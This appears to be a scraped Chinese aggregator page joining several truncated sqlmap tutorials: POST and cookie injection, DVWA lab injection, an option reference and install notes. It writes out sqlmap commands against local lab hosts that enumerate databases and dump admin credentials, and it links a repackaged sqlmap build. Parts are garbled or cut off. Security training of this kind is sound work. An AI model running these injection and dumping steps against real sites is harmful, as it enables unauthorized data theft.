sqlmap

sqlmap的post注入

匿名 (未验证) 提交于 2019-12-02 23:55:01
Ŀ¼ sqlmap的POST注入 cookie注入暴数据库 POST注入 cookie:user=admin"flag参数 验证Cookie: user=admin’ and ‘1’=1’flag,说明这种情况就存在注入 >>这里是修改cookie后进行注入的,那么要结合cookie注入来看post注入的原理,其实两个是要联合进行注入的,互不影响。 cookie注入 1.暴数据库 >>可以看到有四个数据库 POST文件1.txt这里要写文件位置如:/root/1.txt cookie要写成:--cookie="user=admin" 指定数据库类型:--dbms=mysql 暴数据库:--dbs 2.猜表 >>猜出employee数据库下有三个表 猜表:--tables 其它的参数不变 3.表fllaagg中的列 猜列:--columns 4.猜表中的字段 >>找到包含flag的字段 猜字段:--dump 来源:博客园 作者: 请叫我阿毛 链接:https://www.cnblogs.com/loopkep/p/11406765.html

sqlmap环境搭建

匿名 (未验证) 提交于 2019-12-02 23:49:02
1.安装Python2.7.12 1.1、下载Python2.7.12地址: https://www.python.org/downloads/ 1.2、环境变量配置Python2.7.11 1.3、验证Python是否安装完成 2.安装SQLMap http://sqlmap.org/ 2.2、SQLMap安装,解压放在Python目录下 2.3、DOC命令进入sqlmap目录下,输入sqlmap.py -h,出现如下信息则表示安装成功

DVWA 之high级别sql注入

匿名 (未验证) 提交于 2019-12-02 23:48:02
高级注入, 抓包,然后保存数据到1.txt 1. 判断注入点 sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 #level是注入的等级,默认是1 2. 爆数据库 sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --dbs 3. 爆表 sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --tables -D "dvwa" 4. 爆字段 sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --columns -D "dvwa" -T "users" 5.爆 帐号密码 sqlmap -r /root/1.txt -p id --second-order "http://192

SQLmap命令详解

匿名 (未验证) 提交于 2019-12-02 23:43:01
来源于网络,侵权请通知我删除,*请不要转载 Options(选项): --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -v VERBOSE 详细级别:0-6(默认为 1) Target(目标): 以下至少需要设置其中一个选项,设置目标 URL 。 -d DIRECT 直接连接到数据库。 -u URL, --url=URL 目标 URL。 -l LIST 从Burp 或WebScarab 代理的日志中解析目标。 -r REQUESTFILE 从一个文件中载入 HTTP 请求。 -g GOOGLEDORK 处理 Google dork 的结果作为目标 URL。 -c CONFIGFILE 从INI 配置文件中加载选项。 Request(请求):: 这些选项可以用来指定如何连接到目标 URL。 --data=DATA 通过 POST 发送的数据字符串 --cookie=COOKIE HTTP Cookie ͷ --cookie-urlencode URL 编码生成的 cookie 注入 --drop-set-cookie 忽略响应的 Set - Cookie 头信息 --user-agent=AGENT 指定 HTTP User - Agent 头 --random-agent 使用随机选定的 HTTP User - Agent 头 -

kali之使用sqlmap进行sql注入

匿名 (未验证) 提交于 2019-12-02 23:43:01
sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。 sqlmap支持的数据库有 MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB cookie注入 登录网页后在浏览器url栏输入 javascript:document.cookie或者在console栏中输入document.cookie即可获得cookie sqlmap -u "http://可能注入的某个提交参数的url" --cookie="这次提交的cookie" dvwa中测试 sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low;

sqlmap简单使用

最后都变了- 提交于 2019-12-02 23:37:44
get型 判断注入点 python sqlmap.py -u http://127.0.0.1/jdy/typeid.php?typeid=1 1、 获取当前数据库 python sqlmap.py -u "http://127.0.0.1/jdy/typeid.php?typeid=1" --current-db --dbms mysql 2、 获取表 python sqlmap.py -u "http://127.0.0.1/jdy/typeid.php?typeid=1" -D "jdycms" --dbms mysql --batch --tables 3、 获取指定表中字段名 python sqlmap.py -u "http://127.0.0.1/jdy/typeid.php?typeid=1" -D "jdycms" -T "jdy_admin" --columns 4、 获取字段内容 python sqlmap.py -u "http://127.0.0.1/jdy/typeid.php?typeid=1" -D "jdycms" -T "jdy_admin" -C "username,password" --dump post型; 将所拦截的包保存到本地 python sqlmap.py -r C:\Users\gyf\Desktop\post.txt -p

sqlmap 注入的方法及技巧

时光怂恿深爱的人放手 提交于 2019-12-02 23:36:32
sqlmap 注入的方法及技巧 当给 sqlmap 这么一个 url 的时候,它会: 1、判断可注入的参数 2、判断可以用那种 SQL 注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap 支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查 看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返 回在页面中。 4、联合查询注入,可以使用 union 的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。 sqlmap 支持的数据库有: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase 和 SAP MaxDB 可以提供一个简单的 URL,Burp 或 WebScarab 请求日志文件,文本文档 中的完整 http 请求或者 Google 的搜索,匹配出结果页面,也可以自己定义一 个正则来判断那个地址去测试。 测试 GET 参数,POST 参数,HTTP Cookie 参数,HTTP User-Agent 头 和

Windows下安装sqlmap(Python+sqlmap+dvwa)

匿名 (未验证) 提交于 2019-12-02 22:51:30
http://sqlmap.org/ <下载sqlmap的zip文件--解压---将文件所在路径添加到环境变量的PATH里面> 将解压之后的dvwa文件放在PHP环境下(www目录下) 将config文件夹下面的config.inc.php.bak复制一份命名为config.inc.php 修改里面关于数据库的信息 在浏览器中访问该文件,进行安装 安装之后使用账号admin 密码password即可登录 文章来源: Windows下安装sqlmap(Python+sqlmap+dvwa)

[工具] Sqlmap免Python环境绿色版

匿名 (未验证) 提交于 2019-12-02 22:51:30
Sqlmap免Python环境绿色版 SqlMap版本更新说明: 1.升级Sqlmap至最新版 2.更新VC运行库至9.0版,可以在未安装VC运行库的电脑上使用 3.修复上一版本中注入MSSQL时会崩溃的情况 下载地址: https://www.lanzous.com/i2m3fob 来源:博客园 作者: 许小猿 链接:https://www.cnblogs.com/xyuan7/p/11740468.html